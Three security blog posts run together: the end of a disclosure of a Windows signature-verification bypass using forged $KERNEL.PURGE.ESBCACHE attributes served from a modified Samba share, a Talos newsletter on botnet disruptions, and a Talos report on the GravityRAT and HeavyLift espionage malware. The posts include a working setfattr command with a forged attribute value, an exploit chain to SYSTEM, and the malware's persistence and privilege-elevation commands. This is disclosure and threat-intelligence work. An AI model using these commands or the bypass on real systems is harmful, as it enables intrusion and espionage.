  if ( (*(_DWORD *)(*(_QWORD *)(fileObject + 8) + 48LL) & 0x100) != 0 )
  {
    containerState_1 = 0;
  }
  else
  {
    lengthReturned_1 = 0;
    memset(fileBasicInformation, 0, sizeof(fileBasicInformation));
    err = IoQueryFileInformation(fileObject, 4LL, 40LL, fileBasicInformation, &lengthReturned_1);
    if ( (err & 0x80000000) != 0 )
    {
      [...]
      goto LABEL_8;
    }
    fileAttributes = *(_DWORD *)&fileBasicInformation[32];
    // Calling the function above
    err_1 = CipGetVolumeFlags(fileObject, &attributeInformation, &containerState);
    v17 = v51;
    err = err_1;
    if ( (err_1 & 0x80000000) != 0 )
    {
      *a4 = 27;
LABEL_7:
      v22 = *a4;
      goto LABEL_8;
    }
    attributeInformation_FileSystemAttributes = attributeInformation;
    containerState_1 = containerState;
  }
  // If the out variable containerState was non-zero, all of the checks don't matter and we go to LABEL_19 to read the EA.
  if ( (*(_DWORD *)(*(_QWORD *)(fileObject + 8) + 48LL) & 0x100) != 0 || containerState_1 )
    goto LABEL_19;
  if ( (g_CiOptions & 0x100) == 0 )
  {
    if ( (attributeInformation_FileSystemAttributes & 0x20000) == 0 || (fileAttributes & 0x4000) == 0 )
    {
      *a4 = 5;
      v17 = fileAttributes | ((unsigned __int64)attributeInformation_FileSystemAttributes << 32);
      err = 0xC00000BB;
      goto LABEL_7;
    }
    goto LABEL_23;
  }
  if ( (attributeInformation_FileSystemAttributes & 0x20000) != 0 && (fileAttributes & 0x4000) != 0 )
  {
	
	[...]

  }
LABEL_19:
  eaBuffer = ExAllocateFromPagedLookasideList(&g_CiEaCacheLookasideList);
  eaBuffer_1 = eaBuffer;
  if ( !eaBuffer )
  {
    v28 = 28;
    err = 0xC0000017;
    goto LABEL_12;
  }
  v33 = v50;
  eaList[0] = 0;
  LOBYTE(eaList[1]) = 22;
  if ( v50 )
  {
    v34 = "$Kernel.Purge.CIpCache";
    *(_OWORD *)((char *)&eaList[1] + 1) = *(_OWORD *)"$Kernel.Purge.CIpCache";
  }
  else
  {
    v34 = "$Kernel.Purge.ESBCache";
    *(_OWORD *)((char *)&eaList[1] + 1) = *(_OWORD *)"$Kernel.Purge.ESBCache";
  }
  v35 = *((_WORD *)v34 + 10);
  *(int *)((char *)&eaList[5] + 1) = *((_DWORD *)v34 + 4);
  v36 = v34[22];
  *(_WORD *)((char *)&eaList[6] + 1) = v35;
  HIBYTE(eaList[6]) = v36;
  err = FsRtlQueryKernelEaFile(fileObject, eaBuffer, 380LL, 0LL, eaList, 32LL, 0LL, 1LL, &lengthReturned);
  if ( (err & 0x80000000) != 0 )
  {
    *a4 = 2;
LABEL_34:
    v30 = v48;
    v31 = v49;
LABEL_35:
    ExFreeToPagedLookasideList(&g_CiEaCacheLookasideList, eaBuffer_1);
    v17 = v51;
    goto LABEL_36;
  }
  err = CipParseFileCache(eaBuffer_1, v33, (int *)a4, &v51, eaBuffer_1 + 488);
  if ( (err & 0x80000000) != 0 )
    goto LABEL_34;
  v37 = v57;
  err = CipVerifyFileCache((__int64 *)(eaBuffer_1 + 488), eaBuffer_1, fileObject, v57, v58, &v54, (int *)a4, &v51);
  
  [...]

  return err;
}

What we assumed to be an ioctl that would be handled by the SMB driver (using code 0x90390, which isn’t documented officially, but may refer to FSCTL_QUERY_VOLUME_CONTAINER_STATE, based on Microsoft’s Rust headers) turned out to be an ioctl that gets forwarded over SMB to the server. (While we called it NTFS Extended Attributes, these extended attributes in fact work over SMB too.)

If that icotl results in a value with the lowest bit set, containerState/containerState_1 in CipGetFileCache become non-zero and the code jumps to LABEL_19 above (skipping a lot checks on the file type, device type and a g_CiOptions global we don’t fully understand either).

In other words: the $KERNEL.PURGE.ESBCACHE extended attribute on a file on a SMB share is trusted if the SMB server itself responds to this ioctl that it should be trusted! This is of course a problem, as by default non-admin users can mount new network shares.

We started out with samba and patched it to always respond 0x00000001 to this ioctl (it is not implemented currently) and implemented two more ioctls: 0x900f4 (FSCTL_QUERY_USN_JOURNAL) for reading the journaling information and 0x900ef (FSCTL_WRITE_USN_CLOSE_RECORD) for flushing the journal. We configured Samba to use the ext3 extended attributes to store the EAs used for SMB.

And it worked! From our Linux server running samba, we could apply any $KERNEL.PURGE.ESBCACHE attribute on a file and Windows would trust it. On Linux, the extended attributes used by Samba can be set using setfattr. 1

setfattr -n 'user.$KERNEL.PURGE.ESBCACHE' -v '0skwAAAAMAAg4AAAAAAAAAAIC1e18kqdkBQgAAAHUAJwEMgAAAIGliE1R8dXRmTogdh511MDKXHu0gQC2E1gewfvL5KmZ+JwAMgAAAIGOIg7QdUUiX461yis071EIc4IyH1TDa1WkxRY/PW8thJwQMgAAAIDSDabKZZ2jBOK8AdcS2gu8F0miSEm+H/RilbYQrLrbj' "$1"

We could now create fake EAs that could specify any code signing level we wanted. How can we abuse this?

Combining the DLL load and signature bypass

Now we got to the next challenge: how do we combine these two vulnerabilities? We could make wscsvc.dll load our own DLL using path traversal, but we can’t path traversal from C: into an SMB share. A symbolic link could work, but by default non-admin users on Windows are not allowed to create these. Directory junctions and other symlink-like constructs that Windows supports can not point to SMB shares.

We could perform the attack if the user plugged in a NTFS formatted USB device with a symlink to the SMB share. The user could then create a directory junction from the new C: mountpoint in their devicemap to the USB disk.

C:\fakeroot --(directory junction)--> E:\ --(symlink)--> \\sambaserver\mount

But this required physical access to the machine. We preferred something that would also work remotely.

So we needed a third vulnerability: creating a symlink as a non-admin user.

We tried various things, like mounting disk images or unpacking zip files with symlinks, but before we had found a way to do this, Microsoft had rolled out a more extensive fix for the WinSxS manifest loading under impersonated device maps in August 2023 (as CVE-2023-35359): instead of being opt-in for processes, the device map was now always ignored for reading the manifest.

This meant that our DLL loading vulnerability in wscsvc.dll was no longer working, but we still had the signature bypass. So, next question: what can we do with just cached signature level manipulation on Windows?

Applying the signature bypass

Privilege escalation to SYSTEM using .theme files

In the previous post “Getting SYSTEM on Windows in style” we showed how we managed to elevate privileges on Windows by racing a signing check for a DLL included from a Windows .theme file. In that post, we used a race condition, but we originally found it by setting a manipulated $KERNEL.PURGE.ESBCACHE attribute on the *.msstyles_vrf.dll file. This worked in essentially the same way: we set a new theme which refers to a specifically crafted .msstyles file. Next to the .msstyles file, we place a .msstyles_vrf.dll file. When the user logs in (or sets DPI scaling to >100%), WinLogon.exe (which runs as SYSTEM) will check the signature level of this DLL file, and if it is at least signed at level 6 (“Store”), it will load it, elevating our privileges.

As Microsoft completely removed the loading of *.msstyles_vrf.dll files from themes for CVE-2023-38146, this issue was also fixed.

Bypassing WDAC

One place where cached signatures were used for executables is for Windows Defender Application Control (WDAC), which is an allowlisting technology for executables on Windows. This functionality can be used (typically in a corporate environment) to limit which applications a user is allowed to run and which DLLs may be loaded. Binaries can be allowlisted based on file path, file hash but also the identity of the code signer. WDAC policies can be very powerful and granular, so each company using it probably has their own policy, but the default templates allow all software signed by Microsoft itself to run.

Assuming the WDAC policy allows all software signed by Microsoft, we can add an EA indicating Microsoft as the signer to any executable and run it.

Injecting code into protected processes

The signature bypass can also be used by administrators to inject code into a protected process (regardless of the level). For example, by replacing a DLL from system32 with a symlink to a SMB share and then launching a service that runs as a protected process.

Keep in mind that this is not considered a security boundary by Microsoft, which also means that known techniques that abuse this do not get fixed. So for our demonstration we combined it with the approach used by ANGRYORCHARD to mark our thread as a kernel mode thread and then map the device’s physical memory into our process.

Combining all steps

  1. We use the modified EA on a .msstyles_vrf.dll file to bypass the signature verification in Winlogon.exe to elevate privileges to SYSTEM.
  2. We replace a DLL file from system32 with a symlink to a file with a manipulated cached signature on the SMB share. Then, we launch a protected process running at level WindowsTCB (we chose services.exe).
  3. We use our code running in services.exe to inject code into CSRSS.exe and apply the technique from ANGRYORCHARD to gain physical memory r/w.

Combined with the Mark-of-the-Web bypass found by gabe_k for .themepack files, this attack could have been triggered with just the user opening a downloaded file. Depending on the WDAC policy, we could also have bypassed that.

Fix

So, how did Microsoft fix this?

We had hoped they would disable the reading of $KERNEL.* extended attributes from SMB completely. However, that was not the approach that was taken. Instead, the instances we exploited were fixed:

  1. The fix for CVE-2023-38146 already disabled the loading for *.msstyles_vrf.dll files completely, fixing the privilege escalation.
  2. When WDAC is enabled, the function to retrieve the cached signature level of a file now always returns an error (even for local files!).
  3. When loading a DLL into a protected process, the cached signature level is no longer used. (This was fixed despite Microsoft not considering it a defended security boundary.)

Timeline

  • August 25, 2023: Issue reported to MSRC.
  • September 12, 2023: The fix for CVE-2023-38146 was released, breaking our privilege escalation exploit.
  • September 20, 2023: MSRC indicates that they have reproduced the issue and that a fix is scheduled for January 2024.
  • December 11, 2023: MSRC informs us that a regression was found and asks to reschedule the fix to April 2024.
  • April 9, 2024: Fix released for the WDAC and PPL bypass as CVE-2024-20693.
  • April 25, 2024: MSRC asks Microsoft Bounty Team for an update, CCing us.
  • April 26, 2024: Microsoft Bounty Team sends back a boilerplate reply that the case is under review.
  • May 17, 2024: MSRC asks Microsoft Bounty Team for an update, CCing us again.
  • May 22, 2024: Microsoft Bounty Team replies that the vulnerability was out of scope for a bounty, claiming it didn’t reproduce on the right WIP build.

Mitigation

This attack depends on the victim connecting to a malicious SMB server. Therefore, blocking outgoing SMB to the internet would make this attack a lot harder (unless the attacker already has a foothold on the local network). Preventing users from mounting new SMB shares could also be done as a mitigation, but could have more unintended results.

Examining SMB traffic for exploitation of this issue should also be possible by looking for responses to the ioctl 0x90390 or responses for the EA $KERNEL.PURGE.ESBCACHE.

Conclusion

We set out to increase our understanding of Windows internals by adapting research into DLL loading into impersonating services using WinSxS, but we got sidetracked into examining the code signing method used for DLL files and we found a way to bypass it. While we were unable to apply it in the scenario we started out with, we did find other places where we could use it to elevate privileges, bypass WDAC and inject code into protected processes. Just like our previous research “Bad things come in large packages: .pkg signature verification bypass on macOS” about a signature bypass for macOS .pkg files, we see here that vulnerabilities in cryptographic operations can often be applied in a multitude of ways, allowing different security measures to be bypassed. Just like that example, this vulnerability could go from a user opening a downloaded file to full system compromise.


  1. There appears to be a disagreement between Samba and Windows about what a SMB2_FILE_FULL_EA_INFO GetInfo request means. Windows issues it to query the value for a specific EA, while Samba responds with all EAs on a file, which confuses Windows. Instead of trying to patch Samba to fix this, we have resolved it by making sure the $KERNEL.PURGE.ESBCACHE EA is the only EA set on the file. ↩︎

How we can separate botnets from the malware operations that rely on them

13 June 2024 at 18:00
How we can separate botnets from the malware operations that rely on them

As I covered in last week’s newsletter, law enforcement agencies from around the globe have been touting recent botnet disruptions affecting the likes of some of the largest threat actors and malware families.  

Operation Endgame, which Europol touted as the “largest ever operation against botnets,” targeted malware droppers including the IcedID banking trojan, Trickbot ransomware, the Smokeloader malware loader, and more.  

A separate disruption campaign targeted a botnet called “911 S5,” which the FBI said was used to “commit cyber attacks, large-scale fraud, child exploitation, harassment, bomb threats, and export violations.” 

But with these types of announcements, I think there can be confusion about what a botnet disruption means, exactly. As we’ve written about before in the case of the LockBit ransomware, botnet and server disruptions can certainly cause headaches for threat actors, but usually are not a complete shutdown of their operations, forcing them to go offline forever.  

I’m not saying that Operation Endgame and the 911 S5 disruption aren’t huge wins for defenders, but I do think it’s important to separate botnets from the malware and threat actors themselves.  

For the uninitiated, a botnet is a network of computers or other internet-connected devices that are infected by malware and controlled by a single threat actor or group. Larger botnets are often used to send spam emails in large volumes or carry out distributed denial-of-service attacks by using a mountain of IP addresses to send traffic to a specific target all in a short period. Smaller botnets might be used in targeted network intrusions, or financially motivated botnet controllers might be looking to steal money from targets. 

When law enforcement agencies remove devices from these botnets, it does disrupt actors’ abilities to carry out these actions, but it’s not necessarily the end of the final payload these actors usually use, such as ransomware.  

When discussing this topic in relation to the Volt Typhoon APT, Kendall McKay from our threat intelligence team told me in the latest episode of Talos Takes that botnets should be viewed as separate entity from a malware family or APT. In the case of Volt Typhoon, the FBI said earlier this year it had disrupted the Chinese APT’s botnet, though McKay said “we’re not sure yet” if this has had any tangible effects on their operations. 

With past major botnet disruptions like Emotet and other Trickbot efforts, she also said that “eventually, those threats re-emerge, and the infected devices re-propagate [because] they have worm-like capabilities.” 

So, the next time you see headlines about a botnet disruption, know that yes, this is good news, but it’s also not time to start thinking the affected malware is gone forever.  

The one big thing 

This week, Cisco Talos disclosed a new malware campaign called “Operation Celestial Force” running since at least 2018. It is still active today, employing the use of GravityRAT, an Android-based malware, along with a Windows-based malware loader we track as “HeavyLift.” Talos attributes this operation with high confidence to a Pakistani nexus of threat actors we’re calling “Cosmic Leopard,” focused on espionage and surveillance of their targets.  

Why do I care? 

While this operation has been active for at least the past six years, Talos has observed a general uptick in the threat landscape in recent years, with respect to the use of mobile malware for espionage to target high-value targets, including the use of commercial spyware. There are two ways that this attacker commonly targets users to be on the lookout for: One is spearphishing emails that look like they’re referencing legitimate government-related documents and issues, and the other is social media-based phishing. Always be vigilant about anyone reaching out to you via direct messages on platforms like Twitter and LinkedIn.  

So now what? 

Adversaries like Cosmic Leopard may use low-sophistication techniques such as social engineering and spear phishing, but will aggressively target potential victims with various TTPs. Therefore, organizations must remain vigilant against such motivated adversaries conducting targeted attacks by educating users on proper cyber hygiene and implementing defense in depth models to protect against such attacks across various attack surfaces. 

Top security headlines of the week 

Microsoft announced changes to its Recall AI service after privacy advocates and security engineers warned about the potential privacy dangers of such a feature. The Recall tool in Windows 11 takes continuous screenshots of users’ activity which can then be queried by the user to do things like locate files or remember the last thing they were working on. However, all that data collected by Recall is stored locally on the device, potentially opening the door to data theft if a machine were to be compromised. Now, Recall will be opt-in only, meaning it’ll be turned off by default for users when it launches in an update to Windows 11. The feature will also be tied to the Windows Hello authentication protocol, meaning anyone who wants to look at their timeline needs to log in with face or fingerprint ID, or a unique PIN. After Recall’s announcement, security researcher Kevin Beaumont discovered that the AI-powered feature stored data in a database in plain text. That could have made it easy for threat actors to create tools to extract the database and its contents. Now, Microsoft has also made it so that these screenshots and the search index database are encrypted, and are only decrypted if the user authenticates. (The Verge, CNET

A data breach affecting cloud storage provider Snowflake has the potential to be one of the largest security events ever if the alleged number of affected users is accurate. Security researchers helping to address the attack targeting Snowflake said this week that financially motivated cybercriminals have stolen “a significant volume of data” from hundreds of customers. As many as 165 companies that use Snowflake could be affected, which is notable because Snowflake is generally used to store massive volumes of data on its servers. Breaches affecting Ticketmaster, Santander bank and Lending Tree have already been linked to the Snowflake incident. Incident responders working on the breach wrote this week that the attackers used stolen credentials to access customers’ Snowflake instances and steal valuable data. The activity dates back to at least April 14. Reporters at online news outlet TechCrunch also found that hundreds of Snowflake customer credentials were available on the dark web, after malware infected Snowflake staffers’ computers. The list poses an ongoing risk to any Snowflake users who had not changed their passwords as of the first disclosure of this breach or are not protected by multi-factor authentication. (TechCrunch, Wired

Recovery of a cyber attack affecting several large hospitals in London could take several months to resolve, according to an official with the U.K.’s National Health Service. The affected hospitals and general practitioners’ offices serve a combined 2 million patients. A recent cyber attack targeting a private firm called Synnovis that analyzes blood tests has forced these offices to reschedule appointments and cancel crucial surgeries. “It is unclear how long it will take for the services to get back to normal, but it is likely to take many months,” the NHS official told The Guardian newspaper. Britain also had to put out a call for volunteers to donate type O blood as soon as possible, as the attack has made it more difficult for health care facilities to match patients’ blood types at the same frequency as usual. Type O blood is generally known to be safe for all patients and is commonly used in major surgeries. (BBC, The Guardian

Can’t get enough Talos? 

Upcoming events where you can find Talos 

Cisco Connect U.K. (June 25)

London, England

In a fireside chat, Cisco Talos experts Martin Lee and Hazel Burton discuss the most prominent cybersecurity threat trends of the near future, how these are likely to impact UK organizations in the coming years, and what steps we need to take to keep safe.

BlackHat USA (Aug. 3 – 8) 

Las Vegas, Nevada 

Defcon (Aug. 8 – 11) 

Las Vegas, Nevada 

BSides Krakow (Sept. 14)  

Krakow, Poland 

Most prevalent malware files from Talos telemetry over the past week 

SHA 256: 2d1a07754e76c65d324ab8e538fa74e5d5eb587acb260f9e56afbcf4f4848be5 
MD5: d3ee270a07df8e87246305187d471f68 
Typical Filename: iptray.exe 
Claimed Product: Cisco AMP 
Detection Name: Generic.XMRIGMiner.A.A13F9FCC

SHA 256: 9b2ebc5d554b33cb661f979db5b9f99d4a2f967639d73653f667370800ee105e 
MD5: ecbfdbb42cb98a597ef81abea193ac8f 
Typical Filename: N/A 
Claimed Product: MAPIToolkitConsole.exe 
Detection Name: Gen:Variant.Barys.460270 

SHA 256: 9be2103d3418d266de57143c2164b31c27dfa73c22e42137f3fe63a21f793202 
MD5: e4acf0e303e9f1371f029e013f902262 
Typical Filename: FileZilla_3.67.0_win64_sponsored2-setup.exe 
Claimed Product: FileZilla 
Detection Name: W32.Application.27hg.1201 

SHA 256: a024a18e27707738adcd7b5a740c5a93534b4b8c9d3b947f6d85740af19d17d0 
MD5: b4440eea7367c3fb04a89225df4022a6 
Typical Filename: Pdfixers.exe 
Claimed Product: Pdfixers 
Detection Name: W32.Superfluss:PUPgenPUP.27gq.1201 

SHA 256: 0e2263d4f239a5c39960ffa6b6b688faa7fc3075e130fe0d4599d5b95ef20647 
MD5: bbcf7a68f4164a9f5f5cb2d9f30d9790 
Typical Filename: bbcf7a68f4164a9f5f5cb2d9f30d9790.vir 
Claimed Product: N/A 
Detection Name: Win.Dropper.Scar::1201 

Operation Celestial Force employs mobile and desktop malware to target Indian entities

13 June 2024 at 10:00
Operation Celestial Force employs mobile and desktop malware to target Indian entities

By Gi7w0rm, Asheer Malhotra and Vitor Ventura. 

  • Cisco Talos is disclosing a new malware campaign called “Operation Celestial Force” running since at least 2018. It is still active today, employing the use of GravityRAT, an Android-based malware, along with a Windows-based malware loader we track as “HeavyLift.”  
  • All GravityRAT and HeavyLift infections are administered by a standalone tool we are calling “GravityAdmin,” which carries out malicious activities on an infected device. Analysis of the panel binaries reveals that they are meant to administer and run multiple campaigns at the same time, all of which are codenamed and have their own admin panels.  
  • Talos attributes this operation with high confidence to a Pakistani nexus of threat actors we’re calling “Cosmic Leopard,” focused on espionage and surveillance of their targets.  This multiyear operation continuously targeted Indian entities and individuals likely belonging to defense, government and related technology spaces. Talos initially disclosed the use of the Windows-based GravityRAT malware by suspected Pakistani threat actors in 2018 — also used to target Indian entities.  
  • While this operation has been active for at least the past six years, Talos has observed a general uptick in the threat landscape in recent years, with respect to the use of mobile malware for espionage to target high-value targets, including the use of commercial spyware

Operation Celestial Force: A multi-campaign, multi-component infections operation 

Talos assesses with high confidence that this series of campaigns we’re clustering under the umbrella of “Operation Celestial Force” is conducted by a nexus of Pakistani threat actors. The tactics, techniques, tooling and victimology of Cosmic Leopard contain some overlaps with those of Transparent Tribe, another suspected Pakistani APT group, which has a history of targeting high-value individuals from the Indian subcontinent. However, we do not have enough technical evidence to link both the threat actors together for now, therefore we track this cluster of activity under the “Cosmic Leopard” tag. 

Operation Celestial Force has been active since at least 2018 and continues to operate today — increasingly utilizing an expanding and evolving malware suite — indicating that the operation has likely seen a high degree of success targeting users in the Indian subcontinent. Cosmic Leopard initially began the operation with the creation and deployment of the Windows based GravityRAT malware family distributed via malicious documents (maldocs). Cosmic Leopard then created Android-based versions of GravityRAT to widen their net of infections to begin targeting mobile devices around 2019. During the same year, Cosmic Leopard also expanded their arsenal to use the HeavyLift malware family as a malware loader. HeavyLift is primarily wrapped in malicious installers sent to targets tricked into running the into running the malware via social engineering techniques. 

Some campaigns from this multi-year operation have been disclosed and loosely attributed to Pakistani threat actors in previous reporting. However, there has been little evidence to tie all of them together until now. Each campaign in the operation has been codenamed by the threat actor and managed/administered using custom-built panel binaries we call “GravityAdmin.” 

Adversaries like Cosmic Leopard may use low-sophistication techniques such as social engineering and spear phishing, but will aggressively target potential victims with various TTPs. Therefore, organizations must remain vigilant against such motivated adversaries conducting targeted attacks by educating users on proper cyber hygiene and implementing defense-in-depth models to protect against such attacks across various attack surfaces.

Initiating contact and infecting targets 

This campaign primarily utilizes two infection vectors — spear phishing and social engineering. Spear phishing consists of messages sent to targets with pertinent language and maldocs that contain malware such as GravityRAT. 

The other infection vector, gaining popularity in this operation, and now a staple tactic of the Cosmic Leopard’s operations consists of contacting targets over social media channels, establishing trust with them and eventually sending them a malicious link to download either the Windows- or Android-based GravityRAT or the Windows-based loader, HeavyLift. 

Operation Celestial Force employs mobile and desktop malware to target Indian entities
 Malicious drop site delivering HeavyLift. 

Operation Celestial Force’s malware and its management interfaces 

Talos’ analysis reveals the use of multiple components, including Android- and Windows-based malware, and administrative binaries supporting multiple campaign panels used by Operation Celestial Force. 

  • GravityRAT: GravityRAT, a closed-source malware family, first disclosed by Talos in 2018, is a Windows- and Android-based RAT used to target Indian entities.  
  • HeavyLift: A previously unknown Electron-based malware loader family distributed via malicious installers targeting the Windows operating system.  
  • GravityAdmin: A tool to administer infected systems (panel binary), used by operators since at least 2021, by connecting to GravityRAT’s and HeavyLift’s C2 servers. GravityAdmin consists of multiple inbuilt User Interfaces (UIs) that correspond to specific, codenamed, campaigns being operated by malicious operators.   

Operation Celestial Force’s infection chains are:  

Operation Celestial Force employs mobile and desktop malware to target Indian entities

GravityAdmin: Panel binaries administering the campaigns 

The Panel binaries we analyzed consist of multiple versions with the earliest compiled in August 2021. The panel binary asks for a user ID, password and campaign ID (from a drop-down menu) from the operator when it runs.  

Operation Celestial Force employs mobile and desktop malware to target Indian entities
 Login screen for GravityAdmin titled “Bits Before Bullets.”

When the operator clicks the login button, the executable will check if it is connected to the internet by sending a ping request to www[.]google[.]com. Then, the user ID and password are authenticated with an authentication server which sends back: 

  • A code to direct the panel binary to open the panel UI for the specified panel. 
  • Also sends a value back via the HTTP “Authorization” Header. This value acts as an authentication token when communicating with campaign-specific[ C2 servers to load data such as a list of infected machines, etc. 

A typical Panel screen will list the machines infected as part of the specific campaign. It also has buttons to trigger various malicious actions against one or more infected systems.  

Operation Celestial Force employs mobile and desktop malware to target Indian entities

Different panels have different capabilities, however, some core capabilities are common across all campaigns. 

The various campaigns configured in the Panel binaries are code named as: 

  • "SIERRA" 
  • "QUEBEC" 
  • "ZULU" 
  • "DROPPER" 
  • "WORDDROPPER" 
  • "COMICUM" 
  • "ROCKAMORE" 
  • "FOXTROT" 
  • "CLOUDINFINITY" 
  • "RECOVERBIN" 
  • "CVSCOUT" 
  • "WEBBUCKET" 
  • "CRAFTWITHME" 
  • "SEXYBER" 
  • "CHATICO" 

Each of the codenamed campaigns from the Panel binaries consists of its own infection mechanisms. For example, “FOXTROT,” “CLOUDINFINITY” and “CHATICO” are names given to all Android-based GravityRAT infections whereas “CRAFTWITHME,” “SEXYBER” and “CVSCOUT” are named for attacks deploying HeavyLift. Our analysis correlates the campaigns listed above with the Operating Systems being targeted with respective malware families. 

Campaign Name 

Platform targeted and Malware Used 

SIERRA 

Windows, GravityRAT 

QUEBEC 

Windows, GravityRAT 

ZULU 

Windows, GravityRAT 

DROPPER / WORDDROPPER / COMICUM  

Windows, GravityRAT 

ROCKAMORE 

Windows, GravityRAT 

FOXTROT / CLOUDINFINITY / RECOVERBIN / CHATICO    

Android, GravityRAT 

CVSCOUT 

Windows, HeavyLift 

WEBBUCKET / CRAFTWITHME 

Windows, HeavyLift 

SEXYBER 

Windows, HeavyLift 

Most campaigns consist of infrastructure overlaps between each other mostly to host malicious payloads or maintain a list of infected systems. 

Malicious domain 

Campaigns using the domain 

mozillasecurity[.]com 

SIERRA  

QUEBEC 

DROPPER 

officelibraries[.]com 

SIERRA 

DROPPER 

ZULU 

GravityRAT: A multi-platform remote access trojan

GravityRAT is a Windows-based remote access trojan first disclosed by Talos in 2018. GravityRAT was later ported to the Android operating system to target mobile devices around 2019. Since 2019, we’ve observed a continuous addition of a multitude of capabilities in GravityRAT and its associated infrastructure. So far, we have observed the use of GravityRAT exclusively by suspected Pakistani threat actors to target entities and individuals in India. There is currently no publicly available evidence to suggest that GravityRAT is a commodity/open-source malware, suggesting its potential use by multiple, disparate threat actors. 

Our analysis of the entire ecosystem of Operation Celestial Force revealed that GravityRAT’s use in this campaign likely began as early as 2016 and continues to this day. 

The latest variants of GravityRAT are distributed through malicious websites, some registered and set up as late as early January 2024, pretending to distribute legitimate Android applications. Malicious operators will distribute the download links to their targets over social media channels asking them to download and install the malware. 

The latest variants of GravityRAT use the previously mentioned code names to define the campaigns. The screenshot below shows the initial registration of a victim into the C2, getting back a list of alternative C2 to be used, if needed.  

Operation Celestial Force employs mobile and desktop malware to target Indian entities
 The group uses Cloudflare service to hide the true location of their C2 servers.

After registration, the trojan requests tasks to execute to the C2 followed by uploading a file containing the device's location.  

The trojan will use a different user-agent for each request — it's unclear if this is done on purpose, or if this anomaly is just the result of cut-and-paste code from other projects to tie together this trojan’s features.  

GravityRAT requests the following permissions on the device for stealing information and housekeeping tasks. 

Operation Celestial Force employs mobile and desktop malware to target Indian entities

These variants of GravityRAT are similar to previously disclosed versions from ESET and Cyble and consist of the following capabilities: 

  1. Send preliminary information about the device to the C2. This information includes IMEI, phone number, network country ISO code, network operator name, SIM country ISO code, SIM operator name, SIM serial number, device model, brand, product and manufacturer, addresses surrounding the obtained longitude and latitude of the device and the current build information, including release, host, etc. 
  2. Read SMS data and content and upload to the C2. 
  3. Read specific file formats and upload them to the C2. 
  4. Read call logs and upload them to the C2. 
  5. Obtain IMEI information including associated email ID and send it to C2. 
  6. Delete all contacts, call logs and files related to the malware. 

HeavyLift: Electron-based malware loader

Some of the campaigns in this operation use Electron-based malware loaders we’re calling “HeavyLift,” which consist of JavaScript code communicating and controlled by C2 servers. These are the same C2 servers that interact with GravityAdmin, the panel tool used by the operators to govern infected systems. HeavyLift is essentially a stage one malware component that downloads and installs other malicious implants whenever available on the C2 server. HeavyLift bears some similarities with GravityRAT’s Electron versions disclosed previously by Kaspersky in 2020. 

A HeavyLift infection begins with an executable masquerading as an installer for a legitimate application. The installer installs a dummy application but also installs and sets up a malicious Electron-based desktop application. This malicious application is, in fact, HeavyLift and consists of JavaScript code that carries out malicious operations on the infected system. 

On execution, HeavyLift will check if it is running on a macOS or Windows system. If it is running on macOS, and not running as root, it will execute with admin privileges using the command: 

 /usr/bin/osascript -e 'do shell script "bash -c " _process_path " with administrator privileges'  

If it is running as root, it will set the default HTTP User-Agent to “M_9C9353252222ABD88B123CE5A78B70F6”, then get system info using the commands: 

system_profiler SPHardwareDataType | grep 'Model Name' 

system_profiler SPHardwareDataType | grep 'SMC' 

system_profiler SPHardwareDataType | grep 'Model Identifier' 

system_profiler SPHardwareDataType | grep 'ROM' 

system_profiler SPHardwareDataType | grep 'Serial Number'  

For a Windows-based system, the HTTP User-Agent is set to “W_9C9353252222ABD88B123CE5A78B70F6”. The malware will then obtain preliminary system information such as: 

  • Processor ID 
  • MAC address 
  • Installed anti-virus product name 
  • Username 
  • Domain name 
  • Platform information 
  • Process, OS architecture 
  • Agent (hardcoded value) 
  • OS release number 

All this preliminary information is sent to the hardcoded C2 server URL to register the infection with the C2. 

HeavyLift will then reach out to the C2 server to poll for any new payloads to execute on the infected system. A payload received from the C2 will be dropped to a directory in the “AppData” directory and persisted on the system. 

On macOS, the payload is a ZIP file that is extracted, and the resulting binary persists using crontab via the command: 

crontab -l 2>/dev/null; echo ' */2 * * * * “_filepath_” _arguments_ ‘ | crontab - 

For Windows, the payload received is an EXE file that persists on the system via a scheduled task. The malware will create an XML file for the scheduled tasks with the payload path, arguments and working directory and then use the XML to set up the schedtask: 

SCHTASKS /Create /XML "_xmlpath_" /TN "_taskname_" /F 

The malware will then open the accompanying HTML file via web view to appear legitimate. 

 In some cases, the malware will also perform anti-analysis checks to see if it’s running in a virtual environment.  

It checks for the presence of specific keywords before closing if there is a match: 

  • Innotek GmbH 
  • VirtualBox 
  • VMware 
  • Microsoft Corporation 
  • HITACHI

These keywords are checked against model information, SMC, ROM and serial numbers on macOS and Windows against manufacturer information, such as product, vendor, processor and more. 

Coverage 

Ways our customers can detect and block this threat are listed below.  

Operation Celestial Force employs mobile and desktop malware to target Indian entities

 Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.  

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.  

 Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.  

 Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.  

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.  

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.  

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.  

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.  

 Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.  

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.  

 

 

IOCs 

IOCs for this research can also be found at our GitHub repository here

HeavyLift 

8e9bcc00fc32ddc612bdc0f1465fc79b40fc9e2df1003d452885e7e10feab1ee
ceb7b757b89693373ffa1c46dd96544bdc25d1a47608c2ea24578294bcf1db37 
06b617aa8c38f916de8553ff6f572dcaa96e5c8941063c55b6c424289038c3a1 
da3907cf75662c3401581a5140831f8b2520a4c3645257b3860c7db94295af88 
838fd5d269fa09ef4f7e9f586b6577a9f46123a0af551de02de78501d916236d 
12d98137cd1b0cf59ce2fafbfe3a9c3477a42dae840909adad5d4d9f05dd8ede 
688c8e4522061bb9d82e4c3584f7ef8afc6f9e07e2374567755faad2a22e25b8 
5695c1e5e4b381844a36d8281126eef73a9641a315f3fdd2eb475c9073c5f4da 
8d458fb59b6da20e1ba1658bb4a1f7dbb46d894530878e91b64d3c675d3d4516

